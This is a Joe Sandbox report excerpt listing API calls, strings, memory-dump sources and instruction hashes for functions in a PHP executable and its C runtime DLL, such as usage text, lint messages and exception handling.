                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort
                                                • String ID: $csm$csm
                                                • API String ID: 4206212132-1512788406
                                                APIs
                                                  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A524157
                                                • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A524167
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                • String ID: csm$csm
                                                • API String ID: 4108983575-3733052814
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind
                                                • String ID: csm$f
                                                • API String ID: 451473138-629598281
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: NameName::
                                                • String ID: %lf
                                                • API String ID: 1333004437-2891890143
                                                APIs
                                                  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A52266E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abortterminate
                                                • String ID: MOC$RCC$csm
                                                • API String ID: 661698970-2671469338
                                                APIs
                                                Strings
                                                • php, xrefs: 00007FF7498C18C9
                                                • Usage: %s [options] [-f] <file> [--] [args...] %s [options] -r <code> [--] [args...] %s [options] [-B <begin_code>] -R <code> [-E <end_code>] [--] [args...] %s [options] [-B <begin_code>] -F <file> [-E <end_code>] [--] [args...] %s [options] -S <ad, xrefs: 00007FF7498C18D5
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: printfstrrchr
                                                • String ID: Usage: %s [options] [-f] <file> [--] [args...] %s [options] -r <code> [--] [args...] %s [options] [-B <begin_code>] -R <code> [-E <end_code>] [--] [args...] %s [options] [-B <begin_code>] -F <file> [-E <end_code>] [--] [args...] %s [options] -S <ad$php
                                                • API String ID: 1948539113-3325242880
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$__stdio_common_vfprintffprintf
                                                • String ID: %s
                                                • API String ID: 3544570504-620797490
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID:
                                                • API String ID: 2943138195-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+$NameName::
                                                • String ID:
                                                • API String ID: 168861036-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+$Replicator::operator[]
                                                • String ID:
                                                • API String ID: 3863519203-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __intrinsic_setjmpphp_execute_scriptzend_destroy_file_handlezend_stream_init_filename
                                                • String ID:
                                                • API String ID: 2175118776-0
                                                • Opcode ID: c5fe6a64716bed694cbfe46c271dfdb9c936309bae4927b79dc7fdd8c38b3652
                                                • Instruction ID: a033a59ea7c203b8e5d9bd63754767f398d64dbc0a16268c7a633b37a0199d44
                                                • Opcode Fuzzy Hash: c5fe6a64716bed694cbfe46c271dfdb9c936309bae4927b79dc7fdd8c38b3652
                                                • Instruction Fuzzy Hash: B5311676618F89C5EB50BF19E4903AAB3B4FB89B94F805232DA4D437A5CF2CD0688710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8_emalloc@@8zend_hash_str_find@@24zend_str_tolower_copy@@24
                                                • String ID:
                                                • API String ID: 2076930545-0
                                                • Opcode ID: 353dcdba92b2c6342b4c03f9b13c1d40b008483dd01b58404e1354c18f38e80f
                                                • Instruction ID: 5fcaeaf217e0e46870cf75207fbdd8896094526c769536f0423d873807714e0e
                                                • Opcode Fuzzy Hash: 353dcdba92b2c6342b4c03f9b13c1d40b008483dd01b58404e1354c18f38e80f
                                                • Instruction Fuzzy Hash: 67213322A19B55D5DB10BF2598402A96368FB48BE4FC44631EE2D07BD9DF3CE1A68310
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ErrorLastphp_handle_aborted_connectionphp_poll2send
                                                • String ID:
                                                • API String ID: 1866779081-0
                                                • Opcode ID: abf07add748196694ae40f2dc824ed1eb9ea25b80552d8a1dfece6eb73b68d12
                                                • Instruction ID: b91e5fc9aad3f32ed6dc8720714b58261a4b11d9a4b25b96c399814eccb0fbe0
                                                • Opcode Fuzzy Hash: abf07add748196694ae40f2dc824ed1eb9ea25b80552d8a1dfece6eb73b68d12
                                                • Instruction Fuzzy Hash: 5411D322B1CB81C5FB607F2AE84462AE278FB89B94F844034EE4D47B44DF3CE4A59710
                                                APIs
                                                • __zend_realloc.PHP8TS(?,0000000100000001,0000000100000001,00007FF7498C6EDF,?,?,?,00007FF7498CB8EE), ref: 00007FF7498C6FEC
                                                • __zend_malloc.PHP8TS(?,0000000100000001,0000000100000001,00007FF7498C6EDF,?,?,?,00007FF7498CB8EE), ref: 00007FF7498C7012
                                                • memmove.VCRUNTIME140(?,?,?,00007FF7498CB8EE), ref: 00007FF7498C7043
                                                • memmove.VCRUNTIME140(?,?,?,00007FF7498CB8EE), ref: 00007FF7498C705D
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: memmove$__zend_malloc__zend_realloc
                                                • String ID:
                                                • API String ID: 195525502-0
                                                • Opcode ID: e6e82a00cea3ee3d0e073c8dbcb9d34bc24b8eef3bd3751d0547fbe4a8c80dd7
                                                • Instruction ID: dc9a3605253d11e52cbab220b0f8fb223832501f10e91fac17e7ac347a5ea7a6
                                                • Opcode Fuzzy Hash: e6e82a00cea3ee3d0e073c8dbcb9d34bc24b8eef3bd3751d0547fbe4a8c80dd7
                                                • Instruction Fuzzy Hash: 0E219872608B81C2DB00EF19E400368BBB4F785BB4F948226DF68077C0DB78D0A6C350
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                • String ID:
                                                • API String ID: 2933794660-0
                                                • Opcode ID: a30b212504c3ea6b2c4515981d1649eccb2ffc9a0f80d390e0ca8da10d082644
                                                • Instruction ID: f8f71e34a008fe91b8d0bc49efc716ebb96a05d46045c6108992c0fbd44db8b3
                                                • Opcode Fuzzy Hash: a30b212504c3ea6b2c4515981d1649eccb2ffc9a0f80d390e0ca8da10d082644
                                                • Instruction Fuzzy Hash: 24115122B18F018AEB00CF71E8952B933B4FB59B68F040D76DA5D42764DF7CD1588340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$ferrorfwrite
                                                • String ID:
                                                • API String ID: 822410731-0
                                                • Opcode ID: aa0c46da18042519479e706efeca4a93dcabaf0d3885e61b06c3aa308e00c2c0
                                                • Instruction ID: 1d3d9ce62ab8976918e954b80882502f3d2465eabcfb3884e1f94b6b1144cf27
                                                • Opcode Fuzzy Hash: aa0c46da18042519479e706efeca4a93dcabaf0d3885e61b06c3aa308e00c2c0
                                                • Instruction Fuzzy Hash: 57F04420B1D742C1EF15BF6AE954675E274EF48B84F884138CE0E07764EF2DE5948320
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$CreateFrameInfo
                                                • String ID: csm
                                                • API String ID: 2697087660-1018135373
                                                • Opcode ID: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
                                                • Instruction ID: b39c9007b9bd38cecbcb226a3a5adca4bc908ac2632dd901eca98ece41b37c07
                                                • Opcode Fuzzy Hash: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
                                                • Instruction Fuzzy Hash: C151187771CA81C6D620AB56A04027E77B5FB8ABA0F1045B6DB8D07B66DF3CE465CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: void$void
                                                • API String ID: 2943138195-3746155364
                                                • Opcode ID: 8ff03fe2419e3974eeb67dfb792afb4a9b9cae7aa7e23c2e8fbe84b60f38a0b9
                                                • Instruction ID: 74bea70423ec8fc246bbffd6ed5a28223cce749c91b289e95d8535d3c7701d01
                                                • Opcode Fuzzy Hash: 8ff03fe2419e3974eeb67dfb792afb4a9b9cae7aa7e23c2e8fbe84b60f38a0b9
                                                • Instruction Fuzzy Hash: FA310462F18E55D8FB11CBA6E8410FC37B1BB49B58F4401B7EA4E62B69DF38A144C750
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: FileHeader$ExceptionRaise
                                                • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                • API String ID: 3685223789-3176238549
                                                • Opcode ID: 1336bfc7bd71620dddb987db4d102eb14b6a352524fa12ffdcc3c0e48972cdbe
                                                • Instruction ID: 36c28e8f9d857a6067b87c2fda87108101fc1f0f807b8b6acd92d1f2eb99aa5c
                                                • Opcode Fuzzy Hash: 1336bfc7bd71620dddb987db4d102eb14b6a352524fa12ffdcc3c0e48972cdbe
                                                • Instruction Fuzzy Hash: E9018C65B2EE86D1EE008B92E4901B82322FF92FA4F4050F3E50E07A75EF6CE404C710
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
                                                • Instruction ID: f88b696069d30b6bbbf229753ac897d9147f220a9ad34bab49dfdf297320c23e
                                                • Opcode Fuzzy Hash: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
                                                • Instruction Fuzzy Hash: 7F113D3260CF8182EB108F26E44026977A5FB89F94F1842B2DE8D07B78DF3DD5558740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8php_request_shutdownzend_hash_index_del@@16zend_vspprintf
                                                • String ID: %s Closing
                                                • API String ID: 3584861783-2100637938
                                                • Opcode ID: 438469a9f5921bcf9cf2a4a36d90594e9b36b1f7039c76b63023dd852b9db80d
                                                • Instruction ID: 8a6570dbb5cbe498b929f930de82e83ee78adcfd68b375d48d5e32bf8a8aec6d
                                                • Opcode Fuzzy Hash: 438469a9f5921bcf9cf2a4a36d90594e9b36b1f7039c76b63023dd852b9db80d
                                                • Instruction Fuzzy Hash: A3F0FB66618F86C1DB04AF1AE490269A335F788BC4F949136CE0E1B725CE39D0A5C310
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: php_lint_script
                                                • String ID: Errors parsing %s$No syntax errors detected in %s
                                                • API String ID: 692691059-3881924717
                                                • Opcode ID: 7ef8607b5eaa21f7350985fc350835cc1cdc1009de95a6b8fac62e4bcfd6e08f
                                                • Instruction ID: c25ec95c552b2a0b2b19d2fee85005055f641e17b90407d23681236e7f9bc3da
                                                • Opcode Fuzzy Hash: 7ef8607b5eaa21f7350985fc350835cc1cdc1009de95a6b8fac62e4bcfd6e08f
                                                • Instruction Fuzzy Hash: 7001722960DB06C5EB10FF1AE894178A378FB48B84F804036DA4E43760DF6CE019E710
                                                APIs
                                                  • Part of subcall function 00007FFE1A52F040: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A52F100
                                                  • Part of subcall function 00007FFE1A52F040: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1A52EE05), ref: 00007FFE1A52F14F
                                                  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A52EE2A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwindabortterminate
                                                • String ID: csm$f
                                                • API String ID: 4189928240-629598281
                                                • Opcode ID: fb015faef4bf75acf24bdce02b26b27ea635390a237ea967a8c643fc2c3390a7
                                                • Instruction ID: 125677b5e8d48a5aa6203ca8557bf7b8eb441621ae719e5587136ffb325e6b31
                                                • Opcode Fuzzy Hash: fb015faef4bf75acf24bdce02b26b27ea635390a237ea967a8c643fc2c3390a7
                                                • Instruction Fuzzy Hash: E7E06C71E0CB41C1F7145BA2B14017D2B65EF46F74F1440F7DA8806656CF3DD8A44611
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __zend_malloczend_hash_str_update@@32
                                                • String ID: display_errors
                                                • API String ID: 122064108-193476854
                                                • Opcode ID: 8a9fa1dd27072ab7ed04f1d43385623eca899bc9bf9346a2a3558b2d3bcba165
                                                • Instruction ID: bfabcc0d8b104a3fa8ac8cf0c380b7962d714d1f5687cc6e8a6dbda0ac59af28
                                                • Opcode Fuzzy Hash: 8a9fa1dd27072ab7ed04f1d43385623eca899bc9bf9346a2a3558b2d3bcba165
                                                • Instruction Fuzzy Hash: E9F03972518740C6E714AF10E408359FBB0FB88B48F848024DA8D0B3A1CFBEC2E9CB50
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,00007FFE1A526859,?,?,?,?,00007FFE1A52FF42,?,?,?,?,?), ref: 00007FFE1A5269FB
                                                • SetLastError.KERNEL32(?,?,?,00007FFE1A526859,?,?,?,?,00007FFE1A52FF42,?,?,?,?,?), ref: 00007FFE1A526A84
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
